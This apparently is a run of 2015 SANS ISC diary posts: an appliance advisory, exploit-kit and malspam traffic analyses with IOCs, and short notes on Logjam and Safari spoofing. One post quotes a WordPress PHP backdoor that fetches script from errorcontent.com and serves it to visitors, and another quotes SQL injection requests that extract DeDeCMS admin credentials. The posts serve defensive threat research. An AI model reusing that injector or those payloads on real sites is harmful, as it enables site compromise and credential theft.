Blue Coat: SSL Visibility Appliance web based vulnerabilities
Blue Coat has released a security advisory for SSL Visibility Appliance. The SSL Visibility Appliance is susceptible to multiple web-based vulnerabilities in the administration console. A remote attacker can use these vulnerabilities to obtain administrative access to the SSL Visibility Appliance. All versions of SSL Visibility prior to 3.8.4 are vulnerable.
The vulnerabilities exist in the WebUI are:
- Cross-Site Request Forgery (CVE-2015-2852): Cross-site request forgery (CSRF) vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack the authentication of administrators.
- Clickjacking due to improper input validation (CVE-2015-2854): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not send a restrictive X-Frame-Options HTTP header, which allows remote attackers to conduct clickjacking attacks via vectors involving an IFRAME element.
- Cookie theft (CVE-2015-2855): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not set the secure flag for the administrator's cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, a different vulnerability than CVE-2015-4138.
- Session fixation.(CVE-2015-2853): Session fixation vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack web sessions by providing a session ID.
Workarounds:
Limit access to the SSL Visibility management port to trusted clients with limited access to the outside internet. SSLV can be configured to limit the IP addresses capable of accessing the management port.
Limit administrative capabilities by assigning distinct roles for different types of administrators.
Use ProxySG and WebPulse to block access to malicious websites from clients.
Patches:
SSL Visibility
SSLV 3.8 – a fix is available in 3.8.4.
SSLV 3.8.2f – a fix will not be provided.  Please upgrade to the latest release with the vulnerability fix.
SSLV 3.7.4 – a fix will not be provided.  Please upgrade to the latest release with the vulnerability fix.
For further details:
- https://bto.bluecoat.com/security-advisory/sa96
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2852
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2853
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2854
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2855
Weekend Learning - Spoofer Project
1 Comments
Trust But Verify
1 Comments
Angler exploit kit pushing CryptoWall 3.0
Introduction
In the past two days, I've infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24. Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB
On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host where Angler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [1]. On Wednesday, 2015-05-27 at 17:30 UTC, I infected a host where Angler EK sent CryptoWall 3.0 as the malware payload.
I usually see Angler EK send different types of ransomware [2, 3], and I've seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I've noticed CryptoWall from Angler EK.

Shown above: CryptWall 3.0 decrypt instructions from the 2015-05-27 sample
Traffic from the infected host
CryptoWall 3.0 traffic has changed a bit from my first diary about it on 2015-01-19 [4]. Traffic below was seen from the infected host on 2015-05-27 starting at 17:30 UTC.

Shown above: Angler EK and CryptWall 3.0 traffic as seen in Wireshark
Associated domains:
- 216.245.213.5 port 80 - vanskeligstesjeverozapadne1.xadultchat.com - Angler EK
- 91.184.19.41 port 80 - autorijschoolconsistent.nl - CryptoWall 3.0 check-in
- 213.186.33.50 port 80 - jeanrey.fr - CryptoWall 3.0 check-in
- 50.62.123.1 port 80 - 3bsgroup.com - CryptoWall 3.0 check-in
- 75.103.83.9 port 80 - braingame.biz - CryptoWall 3.0 check-in
- 62.221.204.114 port 80 - alsblueshelpt.nl - CryptoWall 3.0 check-in
- 184.168.47.225 port 80 - ammorgan.net - CryptoWall 3.0 check-in
- 79.96.220.223 port 80 - bezpiecznaswinka.pl - CryptoWall 3.0 check-in
- 148.251.140.60 port 80 - asadiag.com - CryptoWall 3.0 check-in
- 184.168.47.225 port 80 - alchemyofpresence.com - CryptoWall 3.0 check-in
- 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paygateawayoros.com - CryptoWall decrpyt instructions
- 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paymentgateposa.com - CryptoWall decrpyt instructions
- 7oqnsnzwwnm6zb7y.optionpaymentprak.com (didn't resolve in DNS) - CryptoWall decrpyt instructions
- 7oqnsnzwwnm6zb7y.watchdogpayment.com (didn't resolve in DNS) - CryptoWall decrpyt instructions
Angler EK:
- vanskeligstesjeverozapadne1.xadultchat.com - GET /molehill_inconsolably_erecting_prematureness/174208500231771131
- vanskeligstesjeverozapadne1.xadultchat.com - GET /OEmjzR2jUP6JG0o9h494My_bK-qvpSFR6NcLcwz5j32hxI3s
- vanskeligstesjeverozapadne1.xadultchat.com - GET /BjWMS7ksUcb9SztLJX7JlXe95voNnRcc7DfUJzRGbqTqKe8X
CryptoWall 3.0 check-in traffic:
- ip-addr.es - GET /
- autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh
- jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh
- 3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh
- braingame.biz - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=mr3jkiznke20nfh
- alsblueshelpt.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?n=mr3jkiznke20nfh
- asambleadedios.org - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=mr3jkiznke20nfh
- ammorgan.net - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?o=mr3jkiznke20nfh
- bezpiecznaswinka.pl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?k=mr3jkiznke20nfh
- asadiag.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?q=mr3jkiznke20nfh
- alchemyofpresence.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?z=mr3jkiznke20nfh
Note: These URLs repeated several times with different random strings at the end.
Traffic caused by viewing the CryptoWall decrypt instructions in a browser:
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /1kwN8ko
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/style.css
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/us.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/it.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rt.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/fr.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /picture.php?k=1kwn8ko&4d2156f57fb503178f62c2f95690e599
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rb.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/es.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/de.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lb.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lt.png

Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion
Preliminary malware analysis
Malware payload delivered by Angler EK on 2015-05-27:
- File size: 232.5 KB ( 238080 bytes )
- MD5 hash: 30ca927d6e800177937788703fc87301
- Detection ratio: 2 / 57
- First submitted: 2015-05-27 19:15:02 UTC
- https://www.virustotal.com/en/file/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792/analysis/
- https://malwr.com/analysis/NGFmYjBiYmQ0N2M2NGExNDhlOTA0OWMzMDk1ZDg5MzM/
- https://www.hybrid-analysis.com/sample/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792?environmentId=2
Final words
A pcap of the 2015-05-27 infection traffic is available at:
A zip file of the associated malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://malware-traffic-analysis.net/2015/05/26/index.html
[2] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
[3] http://malware-traffic-analysis.net/2015/03/25/index.html
[4] https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203
2 Comments
Possible Wordpress Botnet C&C: errorcontent.com
Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):
#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */
/* only run the code if this is Chrome or IE and not a "bot" */
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{  
# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?  ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);
# check if we have the curl extension installed 
if (function_exists('curl_init') && function_exists('curl_exec')) {
$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_8610mezd = curl_exec ($ch);
curl_close($ch);} 
# if we don't have curl, try file_get_contents which requires allow_url_fopen.
elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}
# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }
# The data retrieved will be echoed back to the user if it starts with the string "scr".
I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?
According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated.
3 Comments
Business Value in "Big Data"
There is more information available as to what Big Data really mean. In the type of business that most of us deal with daily, you are likely swamped by huge amount of structured or unstructured data that is entirely, partially or not at all collected. Some of the reasons to collect that data are for competitive advantages, network security, operational issues, etc. but the power of that information is really to make timely decisions.
A study conducted by Forester in 2011 estimated "[...] that firms effectively utilize less than 5% of available data. Why so little? The rest is simply too expensive to deal with."[1] That still leaves 95% of untouched and unanalyzed data. Depending who you ask what is big data to you; you may get different answers such as volume, speed, variety, type and quality. Depending of the size of the network, you may lack the storage capacity to ingest and process everything the network is capable of generating and made difficult choices on what is more important to collect to make those timely decisions.
I think in order to make significant gain in collecting Big Data, there is a need comprehensive approach to managing data, how it is analyzed to gain information intelligence. That means choosing the right data, turning structured or unstructured into a common format (i.e. CEF is a widely supported format), reduce data footprint by keeping and aggregating a single copy of similar data (deduplication) and an archiving policy for old data.
We would like to hear from you. Are you currently evaluating what to do with your data and base on your current security posture, do you think the data you currently collect is enough to get valuable insight as to what is going on inside your network?
Note: If interested in sharing, Stephen Northcutt is currently looking for SEIM/SIEM success stories.
[1] http://blogs.forrester.com/brian_hopkins/11-09-30-big_data_will_help_shape_your_markets_next_big_winners
[2] https://protect724.hp.com/docs/DOC-1072
[3] https://www.linkedin.com/pulse/seimsiem-success-story-request-stephen-northcutt?trk=mp-reader-card
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
0 Comments
Lazy Coordinated Attacks Against Old Vulnerabilities
Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks).
So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS being conducted from what looks like several IP addresses at the same time, that appeared to share the load.
The attack:
GET /uploads/plus/search.php?keyword=11& typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"
DeDeCMS is a Drupal like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any recognizance.
The attacker also doesn't bother modifying the user agent and keep the "Python-urllib/2.7" user agent indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.
The SQL statement that is being attempted:
SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1
A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.
Sort of interesting: These were not the only attacks from these two IP addresses, and they did start out with some recognizance:
GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Here they spoof the Google user agent. The even first try out the "plus/search.php" URL:
GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
But even though it returns a 404, they still proceed with the attack.
[1] http://dedecms.com
[2] http://0day5.com/archives/341
1 Comments
Exploit kits delivering Necurs
Introduction
In the past few days, we've seen Nuclear and Angler exploit kits (EKs) delivering malware identified as Necurs. It certainly isn't the only payload sent from Nuclear and other EKs, but I hadn't really looked into EK traffic sending Necurs lately.
Documented as early as 2012, Necurs is a type of malware that opens a back door on the infected computer [1]. It may also disable antivirus products as well as download additional malware [1][2].
I saw Necurs as a malware payload from Nuclear and Angler EKs last week [3][4]. In each case, traffic went through a gate on 185.14.30.218 (between the compromised website and the EK landing page).
We ran across Nuclear EK delivering Necurs again on 2015-05-20. In this example, the gate was on 91.121.63.249.
I can't share info on the compromised website that kicked off this infection chain; however, we can look at the rest of the traffic.
Infection traffic details
Associated domains:
- 91.121.63.249 port 80 - try.jleveux.com - Redirect (gate) to exploit kit
- 162.247.13.233 port 80 - os.jackmap.com - Nuclear EK
- 188.165.138.220 port 80 - 188.165.138.220 - Post-infection HTTP traffic caused by Necurs
- various IP addresses on various ports - Other post-infection traffic (see below)

Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion
Redirect (gate) leading to the EK:
- 2015-05-20 17:03:32 UTC - try.jleveux.com - GET /js/view.js
Nuclear EK:
- 2015-05-20 17:03:32 UTC - os.jackmap.com - GET /CQEWFR9SHVgRTQkCAlwPAhNNAlgP.html
- 2015-05-20 17:03:33 UTC - os.jackmap.com - GET /BE8SHwtVFUEeUh9SHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB8FDQY
- 2015-05-20 17:03:34 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfUEsNEE0JAFQJDgITT1QNDh9VVxlTW1RNVwBMUltRHQZWUFFSVQZWUlAfVEsxIBARBkc
- 2015-05-20 17:03:36 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB9WHXIAJyE5MHM
HTTP POST requests from the infected host:
- 2015-05-20 17:03:52 UTC - 188.165.138.220 - POST /forum/db.php
- 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
- 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
- 2015-05-20 17:04:46 UTC - 188.165.138.220 - POST /forum/db.php
DGA-style DNS requests from the infected host:
- 2015-05-20 17:03:37 UTC - DNS query for: tihvekkgxvjjstk.com - server response: No such name
- 2015-05-20 17:03:37 UTC - DNS query for: aywqalevruhie.com - server response: No such name
- 2015-05-20 17:03:37 UTC - DNS query for: jdwkjeyumdxbc.com - server response: No such name
- 2015-05-20 17:03:37 UTC - DNS query for: nsktpgiexicpnt.com - server response: No such name
- 2015-05-20 17:03:38 UTC - DNS query for: npkxghmoru.biz - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: llncjudabb.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: veqtdpofgjwe.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: acsgneqxcsoyvmc.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: lbvruinysrbpyjr.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: npkxghmoru.biz - server response: No such name
UDP packets sent from the infected host:
- 2015-05-20 17:03:42 UTC - 192.168.122.202 port 18672 - 95.87.49.120 port 13099
- 2015-05-20 17:03:47 UTC - 192.168.122.202 port 18672 - 87.69.21.149 port 17931 (return traffic noted)
- 2015-05-20 17:03:52 UTC - 192.168.122.202 port 18672 - 85.86.36.76 port 9535
- 2015-05-20 17:04:23 UTC - 192.168.122.202 port 18672 - 123.193.182.220 port 11772
- 2015-05-20 17:04:33 UTC - 192.168.122.202 port 18672 - 82.210.187.14 port 7309
- 2015-05-20 17:04:38 UTC - 192.168.122.202 port 18672 - 158.109.235.80 port 8202
- 2015-05-20 17:04:43 UTC - 192.168.122.202 port 18672 - 93.123.40.76 port 26871
- 2015-05-20 17:05:48 UTC - 192.168.122.202 port 18672 - 46.35.207.228 port 5844
- 2015-05-20 17:09:48 UTC - 192.168.122.202 port 18672 - 128.131.102.41 port 15037
- 2015-05-20 17:10:48 UTC - 192.168.122.202 port 18672 - 79.116.151.17 port 10223
- 2015-05-20 17:11:48 UTC - 192.168.122.202 port 18672 - 109.245.156.224 port 17975
- 2015-05-20 17:12:48 UTC - 192.168.122.202 port 18672 - 186.22.5.205 port 28181
- 2015-05-20 17:13:48 UTC - 192.168.122.202 port 18672 - 197.129.0.92 port 19877
- 2015-05-20 17:15:48 UTC - 192.168.122.202 port 18672 - 150.217.108.178 port 31812
- 2015-05-20 17:17:48 UTC - 192.168.122.202 port 18672 - 109.54.13.232 port 5483
- 2015-05-20 17:19:48 UTC - 192.168.122.202 port 18672 - 2.193.233.219 port 13321
TCP SYN packets sent by the infected host, with no response from the server:
- 2015-05-20 17:04:28 UTC - 192.168.122.202 port 49158 - 141.20.242.66 port 12592
- 2015-05-20 17:06:48 UTC - 192.168.122.202 port 49161 - 199.241.229.89 port 16140
- 2015-05-20 17:08:48 UTC - 192.168.122.202 port 49162 - 190.219.222.57 port 12381
- 2015-05-20 17:14:48 UTC - 192.168.122.202 port 49163 - 49.205.160.135 port 23582
- 2015-05-20 17:16:48 UTC - 192.168.122.202 port 49164 - 79.2.157.254 port 8189
- 2015-05-20 17:18:48 UTC - 192.168.122.202 port 49165 - 77.81.9.120 port 18949
Images from the traffic

Shown above: Link to the gate found in page from the compromised website

Shown above: The gate redirecting traffic to the Nuclear exploit kit landing page

Shown above: Nuclear exploit kit landing page

Shown above: Nuclear exploit kit sends a Flash exploit

Shown above: Nuclear exploit kit sends the malware payload

Shown above: HTTP traffic caused by the malware
Preliminary malware analysis
Malware payload delivered by the Nuclear exploit kit (Necurs)
- File name: C:\Users\username\AppData\Local\Temp\385E.tmp
- File size: 116.0 KB ( 118784 bytes )
- MD5 hash: 41a867c465464efa23b2451ae1367396
- Detection ratio: 7 / 57
- First submitted: 2015-05-20 19:25:00 UTC
- https://www.virustotal.com/en/file/6c362198a8879579c074ee8b0b14e712e059ff7f6037305e26f6d9ed47c6d39b/analysis/
Additional malware found on the infected host (Necurs-related):
- File name: C:\Windows\Temp\UUD95CB.tmp
- File name: C:\Windows\System32\drivers\c4e6d8d66af44d3.sys
- File size: 72.9 KB ( 74688 bytes )
- MD5 hash: b4c59dcef92878abb17c79c7d340851d
- Detection ratio: 4 / 57
- First submitted: 2015-05-20 19:26:34 UTC
- https://www.virustotal.com/en/file/58ec4db50fdaea8b8c078348c555737c9113374800c9b7d9cb9f0a2b8865f527/analysis/
Some of the registry keys for persistence:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_C4E6D8D66AF44D3\000\Control
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\c4e6d8d66af44d3
- NOTE: The same keys were also found in ControlSet001 and ControlSet002
Final words
A pcap of the infection traffic is available at:
A zip file of the associated malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://www.symantec.com/security_response/writeup.jsp?docid=2012-121212-2802-99
[2] https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Necurs
[3] http://malware-traffic-analysis.net/2015/05/14/index3.html
[4] http://malware-traffic-analysis.net/2015/05/15/index.html
8 Comments
Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS
There's a new vulnerability in town... "The new bug, dubbed LogJam, is a cousin of Freak. But it’s in the basic design of TLS itself, meaning all Web browsers, and some email servers, are vulnerable." [1] According to the article, "Internet-security experts crafted a fix for a previously undisclosed bug in security tools used by all modern Web browsers. But deploying the fix could break the Internet for thousands of websites."
Logjam attack can allow an attacker "to significantly weaken the encrypted connection between a user and a Web or email server..." [2]
From: https://weakdh.org/
Diffie-Hellman key exchange is a popular cryptographic algorithm that allows Internet protocols to agree on a shared key and negotiate a secure connection. It is fundamental to many protocols including HTTPS, SSH, IPsec, SMTPS, and protocols that rely on TLS.
We have uncovered several weaknesses in how Diffie-Hellman key exchange has been deployed...
We're starting to see news coverage from other outlets, and we're sure more analysis will emerge. However, at this time your best source for more information on this bug is at weakdh.org.
For now, ensure you have the most recent version of your browser installed, and check for updates frequently. If you’re a system administrator, please review the Guide to Deploying Diffie-Hellman for TLS at https://weakdh.org/sysadmin.html
--
Brad Duncan
ISC Handler and Security Researcher at Rackspace
References:
[1] http://www.wsj.com/articles/new-computer-bug-exposes-broad-security-flaws-1432076565
[2] http://www.pcworld.com/article/2924532/new-encryption-flaw-logjam-puts-web-surfers-at-risk.html
11 Comments
Upatre/Dyre malspam - Subject: eFax message from "unknown"
Introduction
Yesterday on 2015-05-19, I attended a meeting from my local chapter of the Information Systems Security Association (ISSA). During the meeting, one of the speakers discussed different levels of incident response by Security Operations Center (SOC) personnel. For non-targeted issues like botnet-based malicious spam (malspam) infecting a Windows host, you probably won't waste valuable time investigating every little detail. In most cases, you'll probably start the process to re-image the infected computer and move on. Other suspicious events await, and they might reveal a more serious, targeted threat.
However, we still recover information about these malspam campaigns. Traffic patterns evolve, and changes should be documented.
Today's example of malspam
Searching through my employer's blocked spam filters, I found the following Upatre/Dyre wave of malspam:
- Date/Time: 2015-05-19 from from 12:00 AM to 5:47 AM CST
- Number of messages: 20
- Sender (spoofed): [email protected]
- Subject: eFax message from "unknown" - [random number] page(s)
- Attachment: Fax_ewew_43434.zip
As shown in the above image, these messages were tailored for the recipients. You'll also notice some of the recipient email addresses contain random characters and numbers. Nothing new here. It's just one of the many waves of malspam our filters block every day. I reported a similar wave earlier this month [1]. Let's look at the malware.
The attachment is a typical example of Upatre, much like we've seen before. Let's see what this malware does in a controlled environment.
Indicators of compromise (IOC)
I ran the malware on a physical host and generated the following traffic:
- 2015-05-19 15:16:12 UTC - 166.78.246.145 port 80 - icanhazip.com - GET /
- 2015-05-19 15:16:13 UTC - 91.211.17.201 port 13410 - SYN packet to server, no response
- 2015-05-19 15:16:16 UTC - 80.233.179.250 port 443 - two SYN packets to server, no response
- 2015-05-19 15:16:58 UTC - 85.67.42.40 port 443 - two SYN packets to server, no response
- 2015-05-19 15:17:40 UTC - 188.127.129.48 port 443 - SSL traffic - approx 510 KB sent from server to infected host
- 2015-05-19 15:17:56 UTC - 217.10.68.152 port 3478 - UDP STUN traffic to: stun.sipgate.net
- 2015-05-19 15:17:58 UTC - 62.122.69.132 port 443 - SSL traffic - approx 256 KB sent from server to infected host
- 2015-05-19 15:18:40 UTC - 91.211.17.201 port 13409 - SYN packet to server, no response
In my last post about Upatre/Dyre, we saw Upatre-style HTTP GET requests to 91.211.17.201 but no HTTP response from the server [1]. That's been the case for quite some time now. However, in this example, the infected host attempted a TCP connection to 91.211.17.201, but the connection was reset after the initial SYN packet, and an HTTP GET request was never sent.

Shown above: An example of Upatre-style HTTP GET requests from my previous ISC Diary on Upatre/Dyre

Shown above: Attempted TCP connections to the same IP address now reset (RST) by the server
How can we tell this is Upatre? The malware checks for an IP address, and header lines in the associated HTTP GET request fit the pattern for Upatre.
As I've mentioned before, icanhazip.com is a service run by one of my fellow Rackspace employees [2]. By itself, it's not malicious. Unfortunately, malware authors use this and similar services to check an infected computer's IP address.
What alerts trigger on this traffic? See the image below for Emerging Threats-based Snort events on the infection traffic using Security Onion.
Related files on the infected host include:
- C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe (Dyre)
- C:\Users\username\AppData\Local\ne9bzef6m8.dll
- C:\Users\username\AppData\Local\Temp\~TP95D5.tmp (encrypted or otherwise obfuscated)
- C:\Users\username\AppData\Local\Temp\Jinhoteb.exe (where Upatre copied itself after it was run)
Some Windows registry changes for persistence:
- Key name: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Key name: HKEY_USERS\S-1-5-21-52162474-342682794-3533990878-1000\Software\Microsoft\Windows\CurrentVersion\Run
- Value name: GoogleUpdate
- Value type: REG_SZ
- Value data: C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe
A pcap of the infection traffic is available at:
A zip file of the associated Upatre/Dyre malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
Final words
This was yet another wave of Upatre/Dyre malspam. No real surprises, but it's always interesting to note the small changes from these campaigns.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] https://isc.sans.edu/diary/UpatreDyre+the+daily+grind+of+botnetbased+malspam/19657
[2] https://major.io/icanhazip-com-faq
5 Comments
False Positive? settings-win.data.microsoft.com resolving to Microsoft Blackhole IP
Thanks to Xavier for bringing this to our attention. It looks a couple of days ago, a legitimate Microsoft host name, settings-win.data.microsoft.com started to resolve to a Microsoft IP that is commonly used for blackholes that Microsoft operates:
$ host settings-win.data.microsoft.com settings-win.data.microsoft.com is an alias for settings.data.glbdns2.microsoft.com. settings.data.glbdns2.microsoft.com is an alias for blackhole6.glbdns2.microsoft.com. blackhole6.glbdns2.microsoft.com has address 131.253.18.253
Connecting to a blackhole IP like this is often an indicator of compromise, and many IDS's will flag it. For example:
[**] [1:2016101:2] ET TROJAN DNS Reply Sinkhole - Microsoft - 131.253.18.0/24 [**] [Classification: A Network Trojan was detected] [Priority: 1] ...
It is not yet clear what process causes the connect to this IP on port 443. But a number of other users are reporting similar issues. For example, see here:
https://social.technet.microsoft.com/Forums/windowsserver/en-US/37aecee6-0df9-4234-8159-c632070478ad/strange-dns-requests-blocked-by-ips?forum=winserversecurity
At this point, I am assuming that this is some kind of configuration error at Microsoft.
4 Comments
IoT roundup: Apple Watch Patches, Router Vulnerabilities
Yes, there is a security patch for the Apple Watch now. It fixes 13 different vulnerabilities. At least one of the vulnerabilities (CVE-2015-1093) can be used to execute arbitrary code. But not all of the vulnerabilities are "cutting edge". We also got an ICMP redirect issue (CVE-2015-1103) and of course SSL issues that are addressed by disabling old ciphers (FREAK vulnerability) and updating the list of trusted CAs.
The Internet of Things certainly does get a lot of attention this year, and I think rightfully so. I consider web gateways/routers a prime example, and just to make that point, here the top 10 attacks against our web application honeypot:
  25700  GET / HTTP/1.1\r\n
  10596  GET http
   9059  GET /cgi-bin/authLogin.cgi HTTP/1.1\n  <- QNAP shellshock issue
   6771  GET /phpMyAdmin/scripts/setup.php HTTP/1.1\r\n
   6638  GET /pma/scripts/setup.php HTTP/1.1\r\n
   6511  GET /myadmin/scripts/setup.php HTTP/1.1\r\n
   4297  GET /manager/html HTTP/1.1\r\n
   3939  GET /manager/html/ HTTP/1.1\r\n
   3672  GET /tmUnblock.cgi HTTP/1.1\r\n <- Linksys Routers (see "Moon Worm")
   2820  GET /pony/includes/templates/error.tpl HTTP/1.1\r\n
Two of our top ten URLs are attacking exclusively devices. So better make sure you are patched as well as it gets, and try to avoid exposing the admin interface to the public.
0 Comments
Address spoofing vulnerability in Safari Web Browser
A new vulnerability arised in Safari Web Browser that can lead to an address spoofing allowing attackers to show any URL address while loading a different web page. While this proof of concept is not perfect, it could definitely be fixed to be used by phishing attacks very easily.
There is a proof of concept http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari Web Browser:

From same iPad using Google Chrome:

The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the "real" web address instead of the fake one:

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.
Manuel Humberto Santander Peláez
